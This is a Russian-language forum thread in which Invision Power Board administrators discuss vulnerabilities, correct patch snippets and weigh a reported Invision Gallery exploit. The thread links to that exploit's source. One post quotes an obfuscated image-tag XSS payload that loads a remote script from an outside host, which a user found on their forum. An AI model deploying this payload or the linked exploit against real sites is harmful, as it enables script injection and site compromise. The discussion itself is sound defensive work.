Перейти к контенту

Уязвимости форумов Invision Power Board


Рекомендуемые сообщения

дай ссылку на код сплойта, я так и не понял как там до него добраться.

 

ссылка вот такая

http://securityfocus.com/data/vulnerabilit...rm-SQL-inj.html

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 1,2k
  • Создана
  • Последний ответ

Лучшие авторы в этой теме

Лучшие авторы в этой теме

Загружено фотографий

Пофиксил. Спасибо. :D А то в АЦ светиться баннер красный, а на ИБР ничего не говорят. ;)

Ссылка на комментарий
Поделиться на других сайтах

Пофиксил. Спасибо. :D А то в АЦ светиться баннер красный, а на ИБР ничего не говорят. ;)

 

Фикс с маленькой ошибкой

Для 2.1

вместо:

$avatar = "<img src='{$this->ipsclass->skin_url}/images/memsearch_head.gif' border='0' />";

 

надо:

$avatar = "<img src='{$this->ipsclass->skin_url}/memsearch_head.gif' border='0' />";

 

А для 2.0

$avatar = "<img src='{$ibforums->adskin->skin_url}/memsearch_head.gif' border='0' />";

 

Просто по-умолчанию, как мне помнится, картинка по этому адресу лежит!

Ссылка на комментарий
Поделиться на других сайтах

Пофиксил. Спасибо. :D А то в АЦ светиться баннер красный, а на ИБР ничего не говорят. ;)

 

Фикс с маленькой ошибкой

Для 2.1

вместо:

$avatar = "<img src='{$this->ipsclass->skin_url}/images/memsearch_head.gif' border='0' />";

 

надо:

$avatar = "<img src='{$this->ipsclass->skin_url}/memsearch_head.gif' border='0' />";

 

А для 2.0

$avatar = "<img src='{$ibforums->adskin->skin_url}/memsearch_head.gif' border='0' />";

 

Просто по-умолчанию, как мне помнится, картинка по этому адресу лежит!

не знаю, ребята, но у меня в 2.1.7 картинки с таким названием нет не в стандартном скине и в собственном.

Ссылка на комментарий
Поделиться на других сайтах

Фикс с маленькой ошибкой

Для 2.1

вместо:

$avatar = "<img src='{$this->ipsclass->skin_url}/images/memsearch_head.gif' border='0' />";

 

надо:

$avatar = "<img src='{$this->ipsclass->skin_url}/memsearch_head.gif' border='0' />";

 

А для 2.0

$avatar = "<img src='{$ibforums->adskin->skin_url}/memsearch_head.gif' border='0' />";

 

Просто по-умолчанию, как мне помнится, картинка по этому адресу лежит!

Нет. Не надо дезинформаировать нацию. :D

 

не знаю, ребята, но у меня в 2.1.7 картинки с таким названием нет не в стандартном скине и в собственном.

Новости посмотрите, фиксить надо не в скинах, а в файле /sources/action_admin/member.php ;)

Ссылка на комментарий
Поделиться на других сайтах

:D

Нет. Не надо дезинформаировать нацию. ;)

 

А вы видели каталог images в корневой директории в дистрибутиве IPB 2.0.4 ? Я не видел! :)

 

ipb_204\upload\skin_acp\IPB2_Standard - вот тут она лежит эта картинка! Хотя по сути это просто мелочи, каждый сам поправит, когда увидит, что вместо картинки пустое место! В принципе фикс всего лишь убирает аватарку юзера и показывает всегда заготовленную картинку.

Ссылка на комментарий
Поделиться на других сайтах

Уважаемый, не мешайте мух с котлетами.

 

Обновление безопасности опубликовано для IPB 2.1.x. Не путайте людей, сидящих на 2.1 заморочками с 2.0. Не зачем было писать ложную поправку к фиксу 2.1. Исправьте это в сообщении выше.

 

Надеюсь, что никто не будет в недоумении.

 

P.S. Хорошо, что в 2.1 бардака в папке скина админцентра нет. :D

Ссылка на комментарий
Поделиться на других сайтах

Сегодня наткнулся вот на что - Invision Gallery => 2.0.7 ReadFile & SQL-injection xploit by _1nf3ct0r_ - эксплойт для Invision Gallery => 2.0.7 (галлерея для Invision Power Board) реализующий атаку SQL-injection и чтение локальных файлов. _http://hellknights.void.ru/exploits/0x48k-ig207.c

 

Адрес страницы - _http://hellknights.void.ru/exploits.php

Новая дыра появилась... :D

Ссылка на комментарий
Поделиться на других сайтах

Вопрос к тем кто шарит в теме безопасности:

переменная qpid в /sources/post.php

может быть потенциально опасной для SQL-иньекции

 

А то чего-то участились случай попыток атак именно через эту переменную...

Ссылка на комментарий
Поделиться на других сайтах

Song

Подскажи пожалуйста ссылкой на исправление это. Я врооде за фиксами слежу регулярно, но что-то подобного фикса ен встречал...

Ссылка на комментарий
Поделиться на других сайтах

Сегодня наткнулся вот на что - Invision Gallery => 2.0.7 ReadFile & SQL-injection xploit by _1nf3ct0r_ - эксплойт для Invision Gallery => 2.0.7 (галлерея для Invision Power Board) реализующий атаку SQL-injection и чтение локальных файлов. _http://hellknights.void.ru/exploits/0x48k-ig207.c

 

Адрес страницы - _http://hellknights.void.ru/exploits.php

Новая дыра появилась... :D

Эта дыра заделана в 207, если скачивался архив в октябре 2006 года

Проверьте файл rate.php на наличие этого текста

/*
+--------------------------------------------------------------------------
|   Invision Gallery Module v<#VERSION#>
|   ========================================
|   by Adam Kinder
|   (c) 2001 - 2006 Invision Power Services
|   http://www.invisionpower.com
|   ========================================
|   Email: adam@invisionpower.com
+---------------------------------------------------------------------------
|   > $Date: 2006-05-10 09:59:02 -0400 (Wed, 10 May 2006) $
|	> $Revision: 162 $
|	> $Author: akinder $
+---------------------------------------------------------------------------
*/

в старых или варезных версиях идет

$Revision: 131 $

Ссылка на комментарий
Поделиться на других сайтах

-=MIF=- - я сразу проконсультировался у bfarber-а. Он тут же ответил. Привожу его ответ полностью.

Yeah, I've been getting reports on this for a few days.

 

The SQL injection part was patched in 2.0.7 - as Michael said, reupload rate.php if you aren't sure.

 

The readfile appears to be completely bogus (I didn't work on Gallery until the recent version, but I don't think the old versions worked in this manner either). The exploit is indicating you can pass in a dir parameter, and the readfile is going to pull in that dir (or, if you pass in a file, it will pull in that file). Problem is, the script just doesn't work that way...

 

I actually went through the trouble of compiling the .c file today (into an .exe) and tested it against a few sites to be safe. I couldn't get it to work against Gallery 2.0.5, 2.0.7, or the upcoming 2.1.0.

 

Я просто подумал, что здесь этот вопрос неактуален и не стал приводить ответ.. :D

Ссылка на комментарий
Поделиться на других сайтах

-=MIF=- - я сразу проконсультировался у bfarber-а.

 

Я просто подумал, что здесь этот вопрос неактуален и не стал приводить ответ.. :D

я понял, но этот ответ актуален для многих и причины Брендон назвал вколзь: в дистрибутивах галереи до октября 2006 года попадался старый файл рейтинга (можно говорить о невнимательности владельцев галерей или ошибке офсайта, но доказать кто ошибся трудно, да и вряд ли нужно). главное - провериться и поправить, пока не поздно.
Ссылка на комментарий
Поделиться на других сайтах

-=MIF=-

этот ответ актуален для многих

 

Согласен. Говоря о неактуальности я имел в виду администрацию. На www.ipsbeyond.com ответили мгновенно. Репутация не пострадала :-)

Ссылка на комментарий
Поделиться на других сайтах

Сегодня на форуме запостили интересную месагу и потом прислали ПМ где сказали что дескать хотели попортить на форуме но решили просто сообщить об ошибке и посоветовали закрыть дарку.

 

<img src="http://[snapback]	onerror=script=document.createElement(String.fromCharCode(115,99,114,105,112,116)),script.src=/http:xxamclan.infoxscript.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)	style=visibility:hidden	=[/snapback].gif" border="0" alt="Изображение" />

 

То что в коде было написанно прямо в тексте месаги. Еще сказали что работает на IE Only. В файрвоксе когда смотрел месагу то просто ничего не отображалось.

 

Спецы - гляньте чего это такое и стоит ли чего предпринимать.

 

ЗЫЖ Song кстати чегото у тебя на форуме не работает высылание забытого пароля. Я не могу вспомнить чего я прописал при регистрации а сейчас когда пытаюсь выслать напоминание мне на мыло ничего не приходит...

Ссылка на комментарий
Поделиться на других сайтах

Этот патч видимо на скорую руку:

Исправление уязвимостей форумов

после него все равно в snap можно запихать что угодно

Ссылка на комментарий
Поделиться на других сайтах

после него все равно в snap можно запихать что угодно

не будьте голословными, приводите примеры, желательно в приват.

Ссылка на комментарий
Поделиться на других сайтах


×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.